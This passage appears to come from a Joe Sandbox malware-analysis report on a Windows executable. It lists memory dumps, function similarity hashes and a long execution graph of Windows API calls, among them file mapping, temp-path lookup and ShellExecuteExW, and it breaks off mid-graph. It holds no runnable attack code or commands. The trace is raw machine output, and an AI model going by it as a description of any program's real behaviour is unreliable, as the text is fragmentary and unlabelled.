                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastObjectSingleWait
                                                                                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                • API String ID: 1211598281-2248577382
                                                                                • Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                                • Instruction ID: 51549a31964d292f86f33495fae6c9172e3107d0ff85bd555569100ca47edddb
                                                                                • Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                                • Instruction Fuzzy Hash: 2EE01A2DE1998281F600A7249C4E4B826927F60FB8FAC4330D03EE15E39F2CAD498341
                                                                                Function 00007FF65593A43C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: FindHandleModuleResource
                                                                                • String ID: RTL
                                                                                • API String ID: 3537982541-834975271
                                                                                • Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                • Instruction ID: dd44111329cd88169ff4cce313bac9b10bbd2d0473b6c0cec8bfb65dd15181a8
                                                                                • Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                • Instruction Fuzzy Hash: 6AD05EA9F0978282FF194B71A45D37412905F18F49F8D9038C84E9A392EF2CD8CCC791

                                                                                Execution Graph

                                                                                Execution Coverage:12.8%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:28
                                                                                execution_graph 25455 7ff7ab4c1491 25456 7ff7ab4c13c9 25455->25456 25458 7ff7ab4c1900 25456->25458 25484 7ff7ab4c1558 25458->25484 25461 7ff7ab4c198b 25462 7ff7ab4c1868 DloadReleaseSectionWriteAccess 6 API calls 25461->25462 25463 7ff7ab4c1998 RaiseException 25462->25463 25464 7ff7ab4c1bb5 25463->25464 25464->25456 25465 7ff7ab4c1a3d LoadLibraryExA 25467 7ff7ab4c1a54 GetLastError 25465->25467 25468 7ff7ab4c1aa9 25465->25468 25466 7ff7ab4c1b85 25492 7ff7ab4c1868 25466->25492 25472 7ff7ab4c1a69 25467->25472 25473 7ff7ab4c1a7e 25467->25473 25470 7ff7ab4c1abd 25468->25470 25474 7ff7ab4c1ab4 FreeLibrary 25468->25474 25469 7ff7ab4c19b4 25469->25465 25469->25466 25469->25468 25469->25470 25470->25466 25471 7ff7ab4c1b1b GetProcAddress 25470->25471 25471->25466 25477 7ff7ab4c1b30 GetLastError 25471->25477 25472->25468 25472->25473 25476 7ff7ab4c1868 DloadReleaseSectionWriteAccess 6 API calls 25473->25476 25474->25470 25478 7ff7ab4c1a8b RaiseException 25476->25478 25479 7ff7ab4c1b45 25477->25479 25478->25464 25479->25466 25480 7ff7ab4c1868 DloadReleaseSectionWriteAccess 6 API calls 25479->25480 25481 7ff7ab4c1b67 RaiseException 25480->25481 25482 7ff7ab4c1558 _com_raise_error 6 API calls 25481->25482 25483 7ff7ab4c1b81 25482->25483 25483->25466 25485 7ff7ab4c156e 25484->25485 25491 7ff7ab4c15d3 25484->25491 25500 7ff7ab4c1604 25485->25500 25488 7ff7ab4c15ce 25490 7ff7ab4c1604 DloadReleaseSectionWriteAccess 3 API calls 25488->25490 25490->25491 25491->25461 25491->25469 25493 7ff7ab4c1878 25492->25493 25499 7ff7ab4c18d1 25492->25499 25494 7ff7ab4c1604 DloadReleaseSectionWriteAccess 3 API calls 25493->25494 25495 7ff7ab4c187d 25494->25495 25496 7ff7ab4c18cc 25495->25496 25497 7ff7ab4c17d8 DloadProtectSection 3 API calls 25495->25497 25498 7ff7ab4c1604 DloadReleaseSectionWriteAccess 3 API calls 25496->25498 25497->25496 25498->25499 25499->25464 25501 7ff7ab4c161f 25500->25501 25502 7ff7ab4c1573 25500->25502 25501->25502 25503 7ff7ab4c1624 GetModuleHandleW 25501->25503 25502->25488 25507 7ff7ab4c17d8 25502->25507 25504 7ff7ab4c163e GetProcAddress 25503->25504 25506 7ff7ab4c1639 25503->25506 25505 7ff7ab4c1653 GetProcAddress 25504->25505 25504->25506 25505->25506 25506->25502 25509 7ff7ab4c17fa DloadProtectSection 25507->25509 25508 7ff7ab4c1802 25508->25488 25509->25508 25510 7ff7ab4c183a VirtualProtect 25509->25510 25512 7ff7ab4c16a4 VirtualQuery GetSystemInfo 25509->25512 25510->25508 25512->25510 25513 7ff7ab4c20f0 25514 7ff7ab4c2106 _com_error::_com_error 25513->25514 25519 7ff7ab4c4078 25514->25519 25516 7ff7ab4c2117 25517 7ff7ab4c1900 _com_raise_error 14 API calls 25516->25517 25518 7ff7ab4c2163 25517->25518 25520 7ff7ab4c40b4 RtlPcToFileHeader 25519->25520 25521 7ff7ab4c4097 25519->25521 25522 7ff7ab4c40cc 25520->25522 25523 7ff7ab4c40db RaiseException 25520->25523 25521->25520 25522->25523 25523->25516 25524 7ff7ab4bb190 25869 7ff7ab49255c 25524->25869 25526 7ff7ab4bb1db 25527 7ff7ab4bb1ef 25526->25527 25528 7ff7ab4bbe93 25526->25528 25679 7ff7ab4bb20c 25526->25679 25532 7ff7ab4bb1ff 25527->25532 25533 7ff7ab4bb2db 25527->25533 25527->25679 26137 7ff7ab4bf390 25528->26137 25534 7ff7ab4bb2a9 25532->25534 25535 7ff7ab4bb207 25532->25535 25536 7ff7ab4bb391 25533->25536 25541 7ff7ab4bb2f5 25533->25541 25540 7ff7ab4bb2cb EndDialog 25534->25540 25534->25679 25546 7ff7ab4aaae0 48 API calls 25535->25546 25535->25679 25877 7ff7ab4922bc GetDlgItem 25536->25877 25537 7ff7ab4bbeba IsDlgButtonChecked 25538 7ff7ab4bbec9 25537->25538 25543 7ff7ab4bbef0 GetDlgItem IsDlgButtonChecked 25538->25543 25544 7ff7ab4bbed5 SendDlgItemMessageW 25538->25544 25540->25679 25547 7ff7ab4aaae0 48 API calls 25541->25547 26156 7ff7ab4a62dc GetCurrentDirectoryW 25543->26156 25544->25543 25550 7ff7ab4bb236 25546->25550 25551 7ff7ab4bb313 SetDlgItemTextW 25547->25551 25549 7ff7ab4bbf47 GetDlgItem 26166 7ff7ab492520 25549->26166 26170 7ff7ab491ec4 34 API calls _handle_error 25550->26170 25555 7ff7ab4bb326 25551->25555 25554 7ff7ab4bb408 GetDlgItem 25559 7ff7ab4bb422 IsDlgButtonChecked IsDlgButtonChecked 25554->25559 25560 7ff7ab4bb44f SetFocus 25554->25560 25563 7ff7ab4bb340 GetMessageW 25555->25563 25555->25679 25558 7ff7ab4bb246 25562 7ff7ab4bb25c 25558->25562 26171 7ff7ab49250c 25558->26171 25559->25560 25564 7ff7ab4bb4f2 25560->25564 25565 7ff7ab4bb465 25560->25565 25580 7ff7ab4bc363 25562->25580 25562->25679 25570 7ff7ab4bb35e IsDialogMessageW 25563->25570 25563->25679 26174 7ff7ab498d04 25564->26174 25891 7ff7ab4aaae0 25565->25891 25566 7ff7ab491fa0 31 API calls 25566->25679 25570->25555 25575 7ff7ab4bb373 TranslateMessage DispatchMessageW 25570->25575 25571 7ff7ab4bbcc5 25576 7ff7ab4aaae0 48 API calls 25571->25576 25574 7ff7ab4bb52c 26184 7ff7ab4bef80 33 API calls 2 library calls 25574->26184 25575->25555 25581 7ff7ab4bbcd6 SetDlgItemTextW 25576->25581 25577 7ff7ab4bb46f 25898 7ff7ab49129c 25577->25898 26250 7ff7ab4c7904 25580->26250 25585 7ff7ab4aaae0 48 API calls 25581->25585 25584 7ff7ab4bb537 25591 7ff7ab4aaae0 48 API calls 25584->25591 25586 7ff7ab4bbd08 25585->25586 25602 7ff7ab49129c 33 API calls 25586->25602 25588 7ff7ab4bc368 25598 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 25588->25598 25594 7ff7ab4bb555 25591->25594 25592 7ff7ab4bb498 25908 7ff7ab4bf0a4 25592->25908 26185 7ff7ab4ada98 25594->26185 25605 7ff7ab4bc36e 25598->25605 25632 7ff7ab4bbd31 25602->25632 25615 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 25605->25615 25609 7ff7ab4bf0a4 24 API calls 25612 7ff7ab4bb578 25609->25612 25619 7ff7ab491fa0 31 API calls 25612->25619 25613 7ff7ab4bbdda 25623 7ff7ab4aaae0 48 API calls 25613->25623 25625 7ff7ab4bc374 25615->25625 25630 7ff7ab4bb586 25619->25630 25622 7ff7ab4bb5ec 25635 7ff7ab4bb61a 25622->25635 26189 7ff7ab4a32a8 25622->26189 25637 7ff7ab4bbde4 25623->25637 25624 7ff7ab4bb4e8 25624->25622 26188 7ff7ab4bfa80 33 API calls 2 library calls 25624->26188 25642 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 25625->25642 25630->25605 25630->25624 25632->25613 25643 7ff7ab49129c 33 API calls 25632->25643 25922 7ff7ab4a2f58 25635->25922 25654 7ff7ab49129c 33 API calls 25637->25654 25648 7ff7ab4bc37a 25642->25648 25649 7ff7ab4bbd7f 25643->25649 25660 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 25648->25660 25656 7ff7ab4aaae0 48 API calls 25649->25656 25652 7ff7ab4bb634 GetLastError 25653 7ff7ab4bb64c 25652->25653 25934 7ff7ab4a7fc4 25653->25934 25659 7ff7ab4bbe0d 25654->25659 25661 7ff7ab4bbd8a 25656->25661 25658 7ff7ab4bb60e 26192 7ff7ab4b9d90 12 API calls _handle_error 25658->26192 25674 7ff7ab49129c 33 API calls 25659->25674 25665 7ff7ab4bc380 25660->25665 25667 7ff7ab491150 33 API calls 25661->25667 25675 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 25665->25675 25670 7ff7ab4bbda2 25667->25670 25669 7ff7ab4bb65e 25672 7ff7ab4bb665 GetLastError 25669->25672 25673 7ff7ab4bb674 25669->25673 26237 7ff7ab492034 25670->26237 25672->25673 25683 7ff7ab4bb72b 25673->25683 25684 7ff7ab4bb68b GetTickCount 25673->25684 25770 7ff7ab4bb71c 25673->25770 25676 7ff7ab4bbe4e 25674->25676 25677 7ff7ab4bc386 25675->25677 25691 7ff7ab491fa0 31 API calls 25676->25691 25680 7ff7ab49255c 61 API calls 25677->25680 26241 7ff7ab4c2320 25679->26241 25686 7ff7ab4bc3e4 25680->25686 25688 7ff7ab4bba50 25683->25688 26193 7ff7ab4a6454 25683->26193 25937 7ff7ab494228 25684->25937 25692 7ff7ab4bc3e8 25686->25692 25701 7ff7ab4bc489 GetDlgItem SetFocus 25686->25701 25734 7ff7ab4bc3fd 25686->25734 25687 7ff7ab4bbdbe 25695 7ff7ab491fa0 31 API calls 25687->25695 25690 7ff7ab4bb3b1 EndDialog 25688->25690 26231 7ff7ab49bd0c 33 API calls 25688->26231 25726 7ff7ab4bb3da 25690->25726 25699 7ff7ab4bbe78 25691->25699 25707 7ff7ab4c2320 _handle_error 8 API calls 25692->25707 25702 7ff7ab4bbdcc 25695->25702 25698 7ff7ab4bbb79 25712 7ff7ab4aaae0 48 API calls 25698->25712 25705 7ff7ab491fa0 31 API calls 25699->25705 25700 7ff7ab4bba75 26232 7ff7ab491150 25700->26232 25717 7ff7ab4bc4ba 25701->25717 25709 7ff7ab491fa0 31 API calls 25702->25709 25703 7ff7ab4bb74e 26205 7ff7ab4ab914 25703->26205 25704 7ff7ab4bb6ba 25947 7ff7ab491fa0 25704->25947 25713 7ff7ab4bbe83 25705->25713 25715 7ff7ab4bca97 25707->25715 25709->25613 25719 7ff7ab4bbba7 SetDlgItemTextW 25712->25719 25720 7ff7ab491fa0 31 API calls 25713->25720 25714 7ff7ab4bba8a 25721 7ff7ab4aaae0 48 API calls 25714->25721 25716 7ff7ab4bb768 25723 7ff7ab4ada98 48 API calls 25716->25723 25724 7ff7ab49129c 33 API calls 25717->25724 25718 7ff7ab4bb6c8 25952 7ff7ab4a2134 25718->25952 25725 7ff7ab492534 25719->25725 25720->25726 25727 7ff7ab4bba97 25721->25727 25722 7ff7ab4bc434 SendDlgItemMessageW 25728 7ff7ab4bc454 25722->25728 25729 7ff7ab4bc45d EndDialog 25722->25729 25730 7ff7ab4bb7aa GetCommandLineW 25723->25730 25731 7ff7ab4bc4cc 25724->25731 25732 7ff7ab4bbbc5 SetDlgItemTextW GetDlgItem 25725->25732 25726->25566 25733 7ff7ab491150 33 API calls 25727->25733 25728->25729 25729->25692 25735 7ff7ab4bb84f 25730->25735 25736 7ff7ab4bb869 25730->25736 26255 7ff7ab4a80d8 33 API calls 25731->26255 25739 7ff7ab4bbbf0 GetWindowLongPtrW SetWindowLongPtrW 25732->25739 25740 7ff7ab4bbc13 25732->25740 25741 7ff7ab4bbaaa 25733->25741 25734->25692 25734->25722 26209 7ff7ab4920b0 25735->26209 26213 7ff7ab4bab54 33 API calls _handle_error 25736->26213 25739->25740 25972 7ff7ab4bce88 25740->25972 25747 7ff7ab491fa0 31 API calls 25741->25747 25742 7ff7ab4bc4e0 25748 7ff7ab49250c SetDlgItemTextW 25742->25748 25744 7ff7ab4bb87a 26214 7ff7ab4bab54 33 API calls _handle_error 25744->26214 25753 7ff7ab4bbab5 25747->25753 25755 7ff7ab4bc4f4 25748->25755 25750 7ff7ab4bb6f5 GetLastError 25751 7ff7ab4bb704 25750->25751 25968 7ff7ab4a204c 25751->25968 25759 7ff7ab491fa0 31 API calls 25753->25759 25760 7ff7ab4bc526 SendDlgItemMessageW FindFirstFileW 25755->25760 25756 7ff7ab4bb88b 26215 7ff7ab4bab54 33 API calls _handle_error 25756->26215 25758 7ff7ab4bce88 163 API calls 25763 7ff7ab4bbc3c 25758->25763 25764 7ff7ab4bbac3 25759->25764 25765 7ff7ab4bc57b 25760->25765 25861 7ff7ab4bca04 25760->25861 26123 7ff7ab4bf974 25763->26123 25775 7ff7ab4aaae0 48 API calls 25764->25775 25776 7ff7ab4aaae0 48 API calls 25765->25776 25766 7ff7ab4bb89c 26216 7ff7ab4ab9b4 25766->26216 25770->25683 25770->25698 25773 7ff7ab4bca81 25773->25692 25774 7ff7ab4bce88 163 API calls 25789 7ff7ab4bbc6a 25774->25789 25779 7ff7ab4bbadb 25775->25779 25780 7ff7ab4bc59e 25776->25780 25778 7ff7ab4bcaa9 25782 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 25778->25782 25790 7ff7ab49129c 33 API calls 25779->25790 25792 7ff7ab49129c 33 API calls 25780->25792 25781 7ff7ab4bb8d2 CreateFileMappingW 25784 7ff7ab4bb911 MapViewOfFile 25781->25784 25785 7ff7ab4bb953 ShellExecuteExW 25781->25785 25786 7ff7ab4bcaae 25782->25786 25783 7ff7ab4bbc96 26236 7ff7ab492298 GetDlgItem EnableWindow 25783->26236 26229 7ff7ab4c3640 25784->26229 25798 7ff7ab4bb974 25785->25798 25793 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 25786->25793 25789->25783 25794 7ff7ab4bce88 163 API calls 25789->25794 25804 7ff7ab4bbb04 25790->25804 25791 7ff7ab4bb3f5 25791->25571 25791->25690 25795 7ff7ab4bc5cd 25792->25795 25796 7ff7ab4bcab4 25793->25796 25794->25783 25797 7ff7ab491150 33 API calls 25795->25797 25802 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 25796->25802 25799 7ff7ab4bc5e8 25797->25799 25800 7ff7ab4bb996 WaitForInputIdle 25798->25800 25801 7ff7ab4bb9c3 25798->25801 26256 7ff7ab49e164 25799->26256 25806 7ff7ab4bb9ab 25800->25806 25811 7ff7ab4bb9ef 25801->25811 25812 7ff7ab4bb9dc UnmapViewOfFile CloseHandle 25801->25812 25807 7ff7ab4bcaba 25802->25807 25803 7ff7ab4bbb5a 25808 7ff7ab491fa0 31 API calls 25803->25808 25804->25648 25804->25803 25806->25801 25810 7ff7ab4bb9b1 Sleep 25806->25810 25815 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 25807->25815 25808->25690 25809 7ff7ab4bc5ff 25813 7ff7ab491fa0 31 API calls 25809->25813 25810->25801 25810->25806 25811->25625 25814 7ff7ab4bba25 25811->25814 25812->25811 25816 7ff7ab4bc60c 25813->25816 25818 7ff7ab491fa0 31 API calls 25814->25818 25817 7ff7ab4bcac0 25815->25817 25816->25786 25821 7ff7ab491fa0 31 API calls 25816->25821 25822 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 25817->25822 25819 7ff7ab4bba42 25818->25819 25820 7ff7ab491fa0 31 API calls 25819->25820 25820->25688 25823 7ff7ab4bc673 25821->25823 25824 7ff7ab4bcac6 25822->25824 25825 7ff7ab49250c SetDlgItemTextW 25823->25825 25827 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 25824->25827 25826 7ff7ab4bc687 FindClose 25825->25826 25828 7ff7ab4bc6a3 25826->25828 25829 7ff7ab4bc797 SendDlgItemMessageW 25826->25829 25830 7ff7ab4bcacc 25827->25830 26266 7ff7ab4ba2cc 10 API calls _handle_error 25828->26266 25831 7ff7ab4bc7cb 25829->25831 25834 7ff7ab4aaae0 48 API calls 25831->25834 25833 7ff7ab4bc6c6 25835 7ff7ab4aaae0 48 API calls 25833->25835 25836 7ff7ab4bc7d8 25834->25836 25837 7ff7ab4bc6cf 25835->25837 25839 7ff7ab49129c 33 API calls 25836->25839 25838 7ff7ab4ada98 48 API calls 25837->25838 25842 7ff7ab4bc6ec memcpy_s 25838->25842 25841 7ff7ab4bc807 25839->25841 25840 7ff7ab491fa0 31 API calls 25843 7ff7ab4bc783 25840->25843 25844 7ff7ab491150 33 API calls 25841->25844 25842->25796 25842->25840 25845 7ff7ab49250c SetDlgItemTextW 25843->25845 25846 7ff7ab4bc822 25844->25846 25845->25829 25847 7ff7ab49e164 33 API calls 25846->25847 25848 7ff7ab4bc839 25847->25848 25849 7ff7ab491fa0 31 API calls 25848->25849 25850 7ff7ab4bc845 memcpy_s 25849->25850 25851 7ff7ab491fa0 31 API calls 25850->25851 25852 7ff7ab4bc87f 25851->25852 25853 7ff7ab491fa0 31 API calls 25852->25853 25854 7ff7ab4bc88c 25853->25854 25854->25807 25855 7ff7ab491fa0 31 API calls 25854->25855 25856 7ff7ab4bc8f3 25855->25856 25857 7ff7ab49250c SetDlgItemTextW 25856->25857 25858 7ff7ab4bc907 25857->25858 25858->25861 26267 7ff7ab4ba2cc 10 API calls _handle_error 25858->26267 25860 7ff7ab4bc932 25862 7ff7ab4aaae0 48 API calls 25860->25862 25861->25692 25861->25773 25861->25778 25861->25824 25863 7ff7ab4bc93c 25862->25863 25864 7ff7ab4ada98 48 API calls 25863->25864 25866 7ff7ab4bc959 memcpy_s 25864->25866 25865 7ff7ab491fa0 31 API calls 25867 7ff7ab4bc9f0 25865->25867 25866->25817 25866->25865 25868 7ff7ab49250c SetDlgItemTextW 25867->25868 25868->25861 25870 7ff7ab4925d0 25869->25870 25871 7ff7ab49256a 25869->25871 25870->25526 25871->25870 26268 7ff7ab4aa4ac 25871->26268 25873 7ff7ab49258f 25873->25870 25874 7ff7ab4925a4 GetDlgItem 25873->25874 25874->25870 25875 7ff7ab4925b7 25874->25875 25875->25870 25876 7ff7ab4925be SetDlgItemTextW 25875->25876 25876->25870 25878 7ff7ab492334 25877->25878 25879 7ff7ab4922fc 25877->25879 26367 7ff7ab4923f8 GetWindowTextLengthW 25878->26367 25882 7ff7ab49129c 33 API calls 25879->25882 25881 7ff7ab49232a memcpy_s 25883 7ff7ab491fa0 31 API calls 25881->25883 25886 7ff7ab492389 25881->25886 25882->25881 25883->25886 25884 7ff7ab4923c8 25885 7ff7ab4c2320 _handle_error 8 API calls 25884->25885 25887 7ff7ab4923dd 25885->25887 25886->25884 25888 7ff7ab4923f0 25886->25888 25887->25554 25887->25690 25887->25791 25889 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 25888->25889 25890 7ff7ab4923f5 25889->25890 25892 7ff7ab4aaaf3 25891->25892 26411 7ff7ab4a9774 25892->26411 25895 7ff7ab4aab86 25895->25577 25896 7ff7ab4aab58 LoadStringW 25896->25895 25897 7ff7ab4aab71 LoadStringW 25896->25897 25897->25895 25899 7ff7ab4912d0 25898->25899 25900 7ff7ab49139b 25898->25900 25903 7ff7ab491396 25899->25903 25904 7ff7ab491338 25899->25904 25907 7ff7ab4912de memcpy_s 25899->25907 26431 7ff7ab492004 33 API calls std::_Xinvalid_argument 25900->26431 26430 7ff7ab491f80 33 API calls 3 library calls 25903->26430 25906 7ff7ab4c21d0 33 API calls 25904->25906 25904->25907 25906->25907 25907->25592 26432 7ff7ab4bae1c PeekMessageW 25908->26432 25911 7ff7ab4bf0f5 25915 7ff7ab4bf101 ShowWindow IsDlgButtonChecked IsDlgButtonChecked 25911->25915 25912 7ff7ab4bf143 IsDlgButtonChecked IsDlgButtonChecked 25913 7ff7ab4bf1a4 IsDlgButtonChecked 25912->25913 25914 7ff7ab4bf189 25912->25914 25916 7ff7ab4bf1c6 IsDlgButtonChecked IsDlgButtonChecked 25913->25916 25917 7ff7ab4bf1c3 25913->25917 25914->25913 25915->25912 25918 7ff7ab4bf1f3 IsDlgButtonChecked 25916->25918 25919 7ff7ab4bf218 IsDlgButtonChecked 25916->25919 25917->25916 25918->25919 25920 7ff7ab4c2320 _handle_error 8 API calls 25919->25920 25921 7ff7ab4bb4a5 25920->25921 25921->25588 25921->25624 25923 7ff7ab4a309d 25922->25923 25927 7ff7ab4a2f8e 25922->25927 25924 7ff7ab4c2320 _handle_error 8 API calls 25923->25924 25925 7ff7ab4a30b3 25924->25925 25925->25652 25925->25653 25926 7ff7ab4a3077 25926->25923 25928 7ff7ab4a3684 56 API calls 25926->25928 25927->25926 25929 7ff7ab49129c 33 API calls 25927->25929 25931 7ff7ab4a30c8 25927->25931 26437 7ff7ab4a3684 25927->26437 25928->25923 25929->25927 25932 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 25931->25932 25933 7ff7ab4a30cd 25932->25933 25935 7ff7ab4a7fcf 25934->25935 25936 7ff7ab4a7fd2 SetCurrentDirectoryW 25934->25936 25935->25936 25936->25669 25938 7ff7ab494255 25937->25938 25939 7ff7ab49426a 25938->25939 25940 7ff7ab49129c 33 API calls 25938->25940 25941 7ff7ab4c2320 _handle_error 8 API calls 25939->25941 25940->25939 25942 7ff7ab4942a1 25941->25942 25943 7ff7ab493c84 25942->25943 25944 7ff7ab493cab 25943->25944 26583 7ff7ab49710c 25944->26583 25946 7ff7ab493cbb memcpy_s 25946->25704 25948 7ff7ab491fb3 25947->25948 25949 7ff7ab491fdc 25947->25949 25948->25949 25950 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 25948->25950 25949->25718 25951 7ff7ab492000 25950->25951 25955 7ff7ab4a216a 25952->25955 25953 7ff7ab4a219e 25956 7ff7ab4a227f 25953->25956 25958 7ff7ab4a6a0c 49 API calls 25953->25958 25954 7ff7ab4a21b1 CreateFileW 25954->25953 25955->25953 25955->25954 25957 7ff7ab4a22af 25956->25957 25961 7ff7ab4920b0 33 API calls 25956->25961 25959 7ff7ab4c2320 _handle_error 8 API calls 25957->25959 25960 7ff7ab4a2209 25958->25960 25962 7ff7ab4a22c4 25959->25962 25963 7ff7ab4a2246 25960->25963 25964 7ff7ab4a220d CreateFileW 25960->25964 25961->25957 25962->25750 25962->25751 25963->25956 25965 7ff7ab4a22d8 25963->25965 25964->25963 25966 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 25965->25966 25967 7ff7ab4a22dd 25966->25967 25969 7ff7ab4a2072 25968->25969 25970 7ff7ab4a2066 25968->25970 25970->25969 26595 7ff7ab4a20d0 25970->26595 26602 7ff7ab4baa08 25972->26602 25974 7ff7ab4bd1ee 25975 7ff7ab491fa0 31 API calls 25974->25975 25976 7ff7ab4bd1f7 25975->25976 25977 7ff7ab4c2320 _handle_error 8 API calls 25976->25977 25979 7ff7ab4bbc2b 25977->25979 25978 7ff7ab4ad22c 33 API calls 26114 7ff7ab4bcf03 memcpy_s 25978->26114 25979->25758 25980 7ff7ab4beefa 26699 7ff7ab49704c 47 API calls memcpy_s 25980->26699 25983 7ff7ab4bef00 26700 7ff7ab49704c 47 API calls memcpy_s 25983->26700 25985 7ff7ab4bef06 25988 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 25985->25988 25987 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 25989 7ff7ab4beef4 25987->25989 25991 7ff7ab4bef0c 25988->25991 26698 7ff7ab49704c 47 API calls memcpy_s 25989->26698 25993 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 25991->25993 25994 7ff7ab4bef12 25993->25994 25995 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 25994->25995 26001 7ff7ab4bef18 25995->26001 25996 7ff7ab4920b0 33 API calls 25999 7ff7ab4bee77 25996->25999 25997 7ff7ab4beee8 26697 7ff7ab492004 33 API calls std::_Xinvalid_argument 25997->26697 25998 7ff7ab4913a4 33 API calls 26000 7ff7ab4bdc3a GetTempPathW 25998->26000 26695 7ff7ab4babe8 33 API calls 3 library calls 25999->26695 26000->26114 26011 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26001->26011 26002 7ff7ab4a62dc 35 API calls 26002->26114 26003 7ff7ab4beed2 26696 7ff7ab491f80 33 API calls 3 library calls 26003->26696 26007 7ff7ab4beeee 26007->25987 26008 7ff7ab4be7f3 26008->25997 26008->26003 26020 7ff7ab4c21d0 33 API calls 26008->26020 26030 7ff7ab4be83b memcpy_s 26008->26030 26010 7ff7ab4bee8d 26018 7ff7ab491fa0 31 API calls 26010->26018 26021 7ff7ab4beea4 memcpy_s 26010->26021 26016 7ff7ab4bef1e 26011->26016 26012 7ff7ab492520 SetDlgItemTextW 26012->26114 26015 7ff7ab4cbb8c 43 API calls 26015->26114 26022 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26016->26022 26017 7ff7ab498d04 33 API calls 26017->26114 26018->26021 26019 7ff7ab491fa0 31 API calls 26019->26003 26020->26030 26021->26019 26024 7ff7ab4bef24 26022->26024 26023 7ff7ab4baa08 33 API calls 26023->26114 26029 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26024->26029 26026 7ff7ab4bef6c 26703 7ff7ab492004 33 API calls std::_Xinvalid_argument 26026->26703 26027 7ff7ab491fa0 31 API calls 26034 7ff7ab4bee4a 26027->26034 26028 7ff7ab4bef78 26705 7ff7ab492004 33 API calls std::_Xinvalid_argument 26028->26705 26035 7ff7ab4bef2a 26029->26035 26040 7ff7ab4920b0 33 API calls 26030->26040 26077 7ff7ab4beb8f 26030->26077 26031 7ff7ab4a3f30 54 API calls 26031->26114 26034->25996 26034->26003 26046 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26035->26046 26036 7ff7ab4bef72 26704 7ff7ab491f80 33 API calls 3 library calls 26036->26704 26039 7ff7ab4bef66 26702 7ff7ab491f80 33 API calls 3 library calls 26039->26702 26047 7ff7ab4be963 26040->26047 26043 7ff7ab4bed40 26043->26028 26043->26036 26061 7ff7ab4bed3b memcpy_s 26043->26061 26066 7ff7ab4c21d0 33 API calls 26043->26066 26045 7ff7ab4bec2a 26045->26026 26045->26039 26048 7ff7ab4bec72 memcpy_s 26045->26048 26057 7ff7ab4c21d0 33 API calls 26045->26057 26045->26061 26054 7ff7ab4bef30 26046->26054 26055 7ff7ab4bef60 26047->26055 26062 7ff7ab49129c 33 API calls 26047->26062 26607 7ff7ab4bf4e0 26048->26607 26050 7ff7ab4bd5e9 GetDlgItem 26058 7ff7ab492520 SetDlgItemTextW 26050->26058 26052 7ff7ab4b99c8 31 API calls 26052->26114 26053 7ff7ab49e164 33 API calls 26053->26114 26067 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26054->26067 26701 7ff7ab49704c 47 API calls memcpy_s 26055->26701 26056 7ff7ab4a3d34 51 API calls 26056->26114 26057->26048 26064 7ff7ab4bd608 IsDlgButtonChecked 26058->26064 26061->26027 26063 7ff7ab4be9a6 26062->26063 26691 7ff7ab4ad22c 